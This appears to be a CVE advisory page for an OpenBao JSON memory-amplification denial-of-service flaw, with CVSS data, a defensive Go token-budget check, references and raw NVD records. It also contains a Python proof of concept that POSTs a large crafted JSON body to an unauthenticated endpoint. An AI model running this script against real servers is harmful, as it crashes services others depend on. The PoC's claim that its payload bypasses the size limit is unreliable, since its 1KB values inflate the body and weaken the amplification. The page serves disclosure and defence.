Security Vulnerability Report
CVE-2025-59043 (CVSS 7.5, HIGH)

Published: 2025-10-17 16:15:39
Last Modified: 2025-10-24 17:13:11

Description

OpenBao is an open source identity-based secrets management system. In OpenBao versions prior to 2.4.1, JSON objects after decoding may use significantly more memory than their serialized version. It is possible to craft a JSON payload to maximize the factor between serialized memory usage and deserialized memory usage, similar to a zip bomb, with factors reaching approximately 35. This can be used to circumvent the max_request_size configuration parameter which is intended to protect against denial of service attacks. The request body is parsed into a map very early in the request handling chain before authentication, which means an unauthenticated attacker can send a specifically crafted JSON object and cause an out-of-memory crash. Additionally, for requests with large numbers of strings, the audit subsystem can consume large quantities of CPU. The vulnerability is fixed in version 2.4.1.
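As an added defensive illustration (not OpenBao's own code; the project's actual fix is the patch commit listed in the references), the Go snippet below shows the class of check that closes this gap: bounding the decoded structure, not only the serialized bytes, by walking the JSON token stream before the body is ever unmarshalled into a map. ErrTooManyTokens, countTokens, parseBounded and the limit values are assumed names.

```go
package main

import (
	"encoding/json"
	"errors"
	"io"
	"strings"
)

// Assumed names and limits (not OpenBao's): a budget on decoded structure
// that complements the byte limit a max_request_size check gives.
var ErrTooManyTokens = errors.New("json body exceeds token budget")

// countTokens walks the token stream without building the decoded value, so
// memory is O(nesting depth), not O(keys); EOF at depth > 0 is truncation.
func countTokens(r io.Reader, maxTokens int) (int, error) {
	dec, n, depth := json.NewDecoder(r), 0, 0
	for {
		tok, err := dec.Token()
		switch {
		case err == io.EOF && depth == 0:
			return n, nil
		case err == io.EOF:
			return n, io.ErrUnexpectedEOF
		case err != nil:
			return n, err
		}
		if d, ok := tok.(json.Delim); ok && (d == '{' || d == '[') {
			depth++
		} else if ok {
			depth--
		}
		if n++; n > maxTokens {
			return n, ErrTooManyTokens
		}
	}
}

// parseBounded checks bytes, then the token budget, and only then builds the map.
func parseBounded(body string, maxBytes int64, maxTokens int) (map[string]interface{}, error) {
	if int64(len(body)) > maxBytes {
		return nil, errors.New("body exceeds byte limit")
	}
	if _, err := countTokens(strings.NewReader(body), maxTokens); err != nil {
		return nil, err
	}
	var m map[string]interface{}
	if err := json.Unmarshal([]byte(body), &m); err != nil {
		return nil, err
	}
	return m, nil
}
```

A body of many tiny keys passes the byte check but fails the token budget, which is the shape of request this advisory describes; the budget is enforced before any per-key map allocation happens.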

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness: CWE-400 (Uncontrolled Resource Consumption)

Configurations (Affected Products)

cpe:2.3:a:openbao:openbao:*:*:*:*:*:*:*:* - VULNERABLE
OpenBao < 2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-59043 PoC - OpenBao JSON Memory Amplification DoS
# This PoC demonstrates how to craft a JSON payload that bypasses
# max_request_size but causes significant memory consumption after deserialization.

import json
import requests

TARGET_URL = "https://openbao-target.example.com/v1/sys/mounts"
KEY_COUNT = 100000  # Number of distinct keys used to amplify memory usage


def craft_bomb_payload(key_count):
    """
    Create a JSON payload that is small in serialized form but consumes
    significantly more memory when deserialized into a Go map.
    """
    payload = {}
    # A large string value per entry also adds to the deserialized footprint
    # on top of the per-entry map overhead
    large_string = "A" * 1024  # 1KB string per entry
    for i in range(key_count):
        # Each unique key adds overhead for hash computation and map bucket allocation
        payload[f"key_{i}_padding_to_make_it_longer_{'x' * 50}"] = large_string
    return payload


def exploit(target_url):
    headers = {"Content-Type": "application/json"}
    payload = craft_bomb_payload(KEY_COUNT)

    # Serialize - this is what gets checked against max_request_size
    serialized = json.dumps(payload)
    print(f"[*] Serialized payload size: {len(serialized)} bytes")
    print(f"[*] Estimated deserialized memory: ~{len(serialized) * 35} bytes")

    # Send the request - no authentication required
    response = requests.post(target_url, headers=headers, data=serialized)
    print(f"[*] Response status: {response.status_code}")
    print(f"[*] Response body: {response.text[:500]}")


if __name__ == "__main__":
    exploit(TARGET_URL)
```

References

- https://github.com/openbao/openbao/blob/788536bd3e10818a7b4fb00aac6affc23388e5a9/http/logical.go#L50 (Product)
- https://github.com/openbao/openbao/commit/d418f238bc99adc72c73109faf574cc2b672880c (Patch)
- https://github.com/openbao/openbao/pull/1756 (Issue Tracking)
- https://github.com/openbao/openbao/security/advisories/GHSA-g46h-2rq9-gw5m (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-59043",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-17T16:15:38.763",
    "lastModified": "2025-10-24T17:13:10.880",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenBao is an open source identity-based secrets management system. In OpenBao versions prior to 2.4.1, JSON objects after decoding may use significantly more memory than their serialized version. It is possible to craft a JSON payload to maximize the factor between serialized memory usage and deserialized memory usage, similar to a zip bomb, with factors reaching approximately 35. This can be used to circumvent the max_request_size configuration parameter which is intended to protect against denial of service attacks. The request body is parsed into a map very early in the request handling chain before authentication, which means an unauthenticated attacker can send a specifically crafted JSON object and cause an out-of-memory crash. Additionally, for requests with large numbers of strings, the audit subsystem can consume large quantities of CPU. The vulnerability is fixed in version 2.4.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-400"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openbao:openbao:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.4.1",
                "matchCriteriaId": "542C558D-BFC0-4CC6-B683-74E4DFB31A30"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/openbao/openbao/blob/788536bd3e10818a7b4fb00aac6affc23388e5a9/http/logical.go#L50", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://github.com/openbao/openbao/commit/d418f238bc99adc72c73109faf574cc2b672880c", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/openbao/openbao/pull/1756", "source": "[email protected]", "tags": ["Issue Tracking"]},
      {"url": "https://github.com/openbao/openbao/security/advisories/GHSA-g46h-2rq9-gw5m", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}
```